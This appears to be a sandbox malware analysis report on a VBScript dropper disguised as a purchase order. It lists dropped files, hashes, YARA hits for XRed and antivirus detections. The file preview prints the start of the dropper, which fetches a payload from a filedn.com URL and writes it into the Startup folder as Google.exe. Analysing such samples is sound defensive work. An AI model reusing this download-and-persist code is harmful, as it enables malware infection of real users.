                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.246295592763714
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0LzbDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0r+pAZewRDK4mW
                                                                                                                                                                          MD5:36EE7B6AE1AAB392891CD54EFFF8A2C5
                                                                                                                                                                          SHA1:8CFA51B60C52D3047DEA97D1C00017152874276C
                                                                                                                                                                          SHA-256:8D4839CBC4746078EF4453A0CCA12778907FB1D9CF9EFE61E27770BC4EE76601
                                                                                                                                                                          SHA-512:2384F59CF5E37250B551ECFFB0253398F15FFE1FD8EC9084931FBE36E88F6783C27145BB24BCF3DA57C228F170F3D58F470E1A6BFE120020521157465AC79C17
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2681766732010695
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0aKtSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+At+pAZewRDK4mW
                                                                                                                                                                          MD5:F9C9EE92417D4C82ECE07474B944B6C5
                                                                                                                                                                          SHA1:F9CB40157E79948DC68BC50B9310807D677F3218
                                                                                                                                                                          SHA-256:946B84341B0E00A8B3139F74BA239AFC526C7C2D2EDC4D629F57A941D9AFF183
                                                                                                                                                                          SHA-512:92C637AD5347773819E720480A90663622DA2C873A7DF94733E1D40584E5E79F18AAEA50BB448E1FA08678D4AABB99B4D9F08C2B90D8BD55E1E86E2CD0D99667
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.270481335261545
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+m+pAZewRDK4mW
                                                                                                                                                                          MD5:803129F3EE692ED70F5DCE4FBF12002D
                                                                                                                                                                          SHA1:5429F2994FBD315BCAE1259CB241BD899310F374
                                                                                                                                                                          SHA-256:B53CC56BBB1C09C68BD44AC878C0FA3338D17C40BC8B5CD1BD759B02393DDB14
                                                                                                                                                                          SHA-512:639D7A87F9DA5C6DD0C438783288B29D40B7C8DA17FC4C8980A8D4B1DCDFBD48E3B05DEB995250C176540C39E1888346942A0FD309B85C7E24C3AA469A16E018
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.251525330554386
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0HfSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                                                          MD5:A3FD9DB5E429E3FE3687CD04D19F681C
                                                                                                                                                                          SHA1:DF108786DFD2042253227C2B887001DD511C3CBA
                                                                                                                                                                          SHA-256:99E57F4AC889480561F09E725A12E75FBBAEDF9A90B3FB12094DCDE3B22849E7
                                                                                                                                                                          SHA-512:C0D49A83A5A527FDDFFB6930A190D514F02C1AC42C76EBB8F5ADCD8BFBF8D061909EBB2236175A5C2A17398BBA695EC0B889C685A2F213AA93C428E6EA7B36B2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.262777937111682
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0Qw3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+RE+pAZewRDK4mW
                                                                                                                                                                          MD5:9FB264629952A0D5B4B9F9D111BE5457
                                                                                                                                                                          SHA1:08A0D88DD1AC6F11444CE6087088968558A5E08C
                                                                                                                                                                          SHA-256:D646A2A3003EC2B775F49064CBED8BA2CEDE5DCB1E67D20427F4CCB9FC8F6490
                                                                                                                                                                          SHA-512:BF119DCBCB9C0C30B8A1BD9452C17E17835287D5783455F5344CE8BB2ADA33249530DBFB18772B816A91C149A7DEF65A75A5BFBFD2E40A0E7EED591A86401737
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.264268873246207
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0b2tBSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1B+pAZewRDK4mW
                                                                                                                                                                          MD5:F6F8A6293381ECE1ACE722660272F459
                                                                                                                                                                          SHA1:FE714F2FCD99D8A33E50F2FD42BECEC7F54F6C42
                                                                                                                                                                          SHA-256:7194699C5478E04E62D647469B2BB597DC34D5C12404E090DBAB2AF9BDAE1BC4
                                                                                                                                                                          SHA-512:6868416518B4765454EC78F055DC6C06AA3B3A03909FE395501534A21EA8A3D060C6D843705B45FF246AA6F9C6E9BDBDE36762A56FB963617E55CB9257A7DE1D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.274261397374661
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0xzDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+G+pAZewRDK4mW
                                                                                                                                                                          MD5:61D0AF1AD35AC4B0F9F2ACDB15D69151
                                                                                                                                                                          SHA1:684800281246FF1F6B1CDEB77D87F6671E50D3C2
                                                                                                                                                                          SHA-256:F31627C01AA649A4E936BEB93E19F667B1F6A577F6C6885CCE55630ADE9365FF
                                                                                                                                                                          SHA-512:CEF266C9D56DCE79F89C9226E7B8CECDA15C23C734731432C14B35F0BC4EE63EFB165ABA57A29377E70DA580B341D6BE79102B419FCF3B3588427EB33163F650
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.271054625442911
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0nSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                                                                                                          MD5:72FE16051C00A0341D710FB59AB9B0B6
                                                                                                                                                                          SHA1:7043D2DFE2C8B721384A64544A7EEA0E3CAD0603
                                                                                                                                                                          SHA-256:6C698E648E5B7CAED2DE5BB0F12674C2F6F54ABFB0AE3BFCE1F81D6273A55533
                                                                                                                                                                          SHA-512:5DA296304B4FB98DBE97F2E7B3107664FA30388F141635488E8C1BAA872754AD2674063BDEB86EE946DA0012DAB7D47088EF4BD8BD0D7642CE2929FE837C15EE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.263639049105763
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0TASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                                                                                          MD5:C12EA14D6CF2FB1F02336E47B8520532
                                                                                                                                                                          SHA1:ACE6DCC84814B7A8EED57613DA79E29653096CB6
                                                                                                                                                                          SHA-256:5B6B069E29CB46C84D917B2255C9BD7F269EB17B8D4E5857272C030EE0277F23
                                                                                                                                                                          SHA-512:10AC504B1D90FEAC5ED80B3882481A9D980F43D83262FBAB517E6EC8C8115D06E5535083966274C8CBC11E5595740B0DAD061C2E1181BD6089BE2CBA610A9B8B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                          Entropy (8bit):1.5231029153786204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:WH25nJFV:WH2/
                                                                                                                                                                          MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                                                                          SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                                                                          SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                                                                          SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                          Entropy (8bit):3.746897789531007
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                          MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                          SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                          SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                          SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                          Entropy (8bit):3.746897789531007
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                          MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                          SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                          SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                          SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1436672
                                                                                                                                                                          Entropy (8bit):7.208680290347871
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                                                                                          MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                          SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                                                                                          SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                                                                                          SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2208256
                                                                                                                                                                          Entropy (8bit):7.058935933771513
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:49152:AnsHyjtk2MYC5GDokwkn9IMHeaXA0COysPklzMKGmPyaPCSO:Ansmtk2aCdnV/MOKpPCt
                                                                                                                                                                          MD5:A6BD561711EA8C2064C20644CCEEE074
                                                                                                                                                                          SHA1:CB330A1AD78387BDC401142FEECAC763AC63D3D9
                                                                                                                                                                          SHA-256:E6F8EDCBE69419008B7E54F8554FC1AEC66208DE10C26A982D624EA91AED8092
                                                                                                                                                                          SHA-512:62D55F02D14D122B10A0EF08DFA5FFA950F4153863246E3F6E6A6BD1A4D1C63321C7C4E9FB4306C0535E73389D764CC0646C0821A62FD50A2896EC49F205490B
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:48:44 2024, mtime=Mon Dec 30 09:48:44 2024, atime=Mon Dec 30 09:48:44 2024, length=1436672, window=hide
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1808
                                                                                                                                                                          Entropy (8bit):3.4253439503157814
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:86SolSoX8sXS497WkChLY//o3MLe/0cIA+AK/wLEjAG/H8WURBMJW2+UNP1zTlDM:85Lg1HCeeQx4LQAgU8E2+s9T4Il9NDm
                                                                                                                                                                          MD5:0D01D44F9AD7C193DE5A867520C37F4D
                                                                                                                                                                          SHA1:6F217CFBD4DD8C137AEFBC96E87B0E52733DE69D
                                                                                                                                                                          SHA-256:26056D122196265BC2137D2816916D6A2906421241B003B74F5E0EDAC0F877C5
                                                                                                                                                                          SHA-512:77751AB0C20529E7CFE9BC162A50672B4CE5A6752AC29A55F146C6E2E85EFDE07FA2F205E1EF6DD377447F728ABCC446D7ADCF83A3CCA487B398709118466B1E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:L..................F.@.. ....cue.Z....we.Z....we.Z............................:..DG..Yr?.D..U..k0.&...&.......y.Yd......[.Z..$\.f.Z......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.Y.V..........................d...A.p.p.D.a.t.a...B.V.1......Y.V..Roaming.@......EW)B.Y.V............................Z.R.o.a.m.i.n.g.....V.1......Y.V..Windata.@......Y.V.Y.V.....)........................W.i.n.d.a.t.a.....`.2......Y.V .TCPKPY.exe..F......Y.V.Y.V.....)....................'5#.T.C.P.K.P.Y...e.x.e.......a...............-.......`............N.......C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.T.C.P.K.P.Y...e.x.e.*.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1436672
                                                                                                                                                                          Entropy (8bit):7.208680290347871
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24576:W4lavt0LkLL9IMixoEgeaXA0Cw9ysPkOgDOWabKOq5qfbmp9Oe4q9MmCS:hkwkn9IMHeaXA0COysPklzMKGmPyaPCS
                                                                                                                                                                          MD5:3BF7444911198B54B1E8AB53F236683E
                                                                                                                                                                          SHA1:84E7DB884577DF03C7A4FEB54651985D76856C16
                                                                                                                                                                          SHA-256:78BCE6367FA6F47F8FF5F2E72A4F91065AD36F470860DA23542D450EFD1F896E
                                                                                                                                                                          SHA-512:551E4A88495F9E18C226E27CC342E968C659EC93AC5E7ADF4A23F1B0ED3D915FAE3BCE61E0845F5DB7882A0DFFF451F3D3839D00A03AE984E80BFE2E7AB8953F
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                          Entropy (8bit):1.5231029153786204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:WH25nJFV:WH2/
                                                                                                                                                                          MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                                                                          SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                                                                          SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                                                                          SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                          Entropy (8bit):6.638013190381294
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                          MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                          SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                          SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                          SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\IPKGELNTQY\~$cache1, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):165
                                                                                                                                                                          Entropy (8bit):1.5231029153786204
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:WH25nJFV:WH2/
                                                                                                                                                                          MD5:FB5ABAA34A0BB284B640327B9745AAAC
                                                                                                                                                                          SHA1:7E1063A0F1DE0E83424399F104C1D3752BFAECDE
                                                                                                                                                                          SHA-256:12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
                                                                                                                                                                          SHA-512:0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):771584
                                                                                                                                                                          Entropy (8bit):6.638013190381294
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                          MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                          SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                          SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                          SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\LSBIHQFDVT\~$cache1, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                          Entropy (8bit):4.3723124208059
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6144:1FVfpi6ceLP/9skLmb0zyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:zV1JyWWI/glMM6kF7qq
                                                                                                                                                                          MD5:256B012C274EDA493C5D7CE2C229ACB0
                                                                                                                                                                          SHA1:D17BC9CEE8A2E00A9504E86EB4CEDE6CB3DC0641
                                                                                                                                                                          SHA-256:42E738436220A2D026ECE44ED7C02E3E6B62E7AD59969BD5F44141137C24D182
                                                                                                                                                                          SHA-512:77D930366EC13D07F607D5A96917404633594E2B2A44D87BCB24BF26113137A70FC2C309231B716D199EB6C7934C7B0E4070EDDB22F042728980C6C060C5E706
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          File type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                          Entropy (8bit):5.498755302006385
                                                                                                                                                                          TrID:
                                                                                                                                                                            File name:Open Purchase Order Summary Sheet.vbs
                                                                                                                                                                            File size:641 bytes
                                                                                                                                                                            MD5:2bf2f38caab1fe7c657d29984c228b71
                                                                                                                                                                            SHA1:7a469f97c2e5d0dc1b786d89fc90c11a413275a5
                                                                                                                                                                            SHA256:44d5e912b8ef69914ba4ba6064dcded455f65e53ae2cfe4addee0f597b51e2c1
                                                                                                                                                                            SHA512:d15b9206341d49ec4928dc8f333c89e7bbc2cf31c3005c5bd6cea8bdbd91505607552c2e833bdbebf2235c75d2aeb97837bd5a9aaa3f531dfe4d2c4a28b2b428
                                                                                                                                                                            SSDEEP:12:qDTRPhvAHZsAbs1vWdEV7wsk/CxbDNfb852ms2/bFNQHJ5xDzVs4vl7iajIlEjv:OTRPm9bs1AwkIbDNDSbbFNQvxDq4d7vP
                                                                                                                                                                            TLSH:66F0230ADC00DAE6063BF5E07552B429D5E30449B2B862252681DD5E5E0C3C91C0089B
                                                                                                                                                                            File Content Preview:'<<< Coded By Mr.3amo>>> ..Set VIkvvtzh = CreateObject("WScript.Shell")..iSquxnRH = VIkvvtzh.SpecialFolders("Startup") & "\Google.exe"..'<<<<<<<<<<< code start >>>>>>>>>>>..On Error Resume Next..wscript.sleep 3000..call jOjxpLIz("https://filedn.com/lp8FEq
                                                                                                                                                                            Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
